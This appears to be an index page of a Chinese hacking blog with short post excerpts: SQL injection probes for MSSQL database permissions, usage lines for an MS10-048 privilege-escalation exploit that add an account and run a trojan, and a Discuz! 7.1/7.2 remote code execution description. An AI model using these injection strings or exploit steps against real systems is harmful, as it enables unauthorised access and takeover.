Security
收集的一些有些历史的注入命令
by ProdigYu on Mar.21, 2012, under Injection
//看看是什么权限的
and 1=(Select IS_MEMBER(‘db_owner’))
And char(124)%2BCast(IS_MEMBER(‘db_owner’) as varchar(1))%2Bchar(124)=1 ;–
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS(‘master’))
And char(124)%2BCast(HAS_DBACCESS(‘master’) as varchar(1))%2Bchar(124)=1 –
(continue reading…)
如何成为一名黑客
by ProdigYu on Oct.08, 2010, under Security
原著:Eric S. Raymond (esr@thyrsus.com)
翻译:SilentScreamer
为什么写这个文档 (continue reading…)
伪静态注入技术
by ProdigYu on Oct.06, 2010, under Injection
常规的伪静态页面如下:http://www.XXX.com/play/Diablo.html,在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多,也很简单这里就不说了。 (continue reading…)
MS10-048 本地提权漏洞利用
by ProdigYu on Oct.05, 2010, under Exploits
USE MS10048.EXE NET USER XX XX /ADD
USE MS10048.EXE MUMA.EXE (continue reading…)
Discuz! 7.1 & 7.2 远程代码执行漏洞
by ProdigYu on Sep.18, 2010, under Exploits
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。
漏洞介绍:
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。 (continue reading…)
